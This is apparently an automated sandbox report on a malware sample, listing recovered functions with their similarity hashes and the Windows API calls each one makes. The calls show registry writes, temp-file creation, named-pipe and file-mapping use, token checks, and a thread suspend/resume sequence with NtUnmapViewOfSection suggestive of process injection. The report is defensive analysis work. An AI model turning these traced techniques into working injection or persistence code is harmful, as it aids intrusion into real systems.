  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
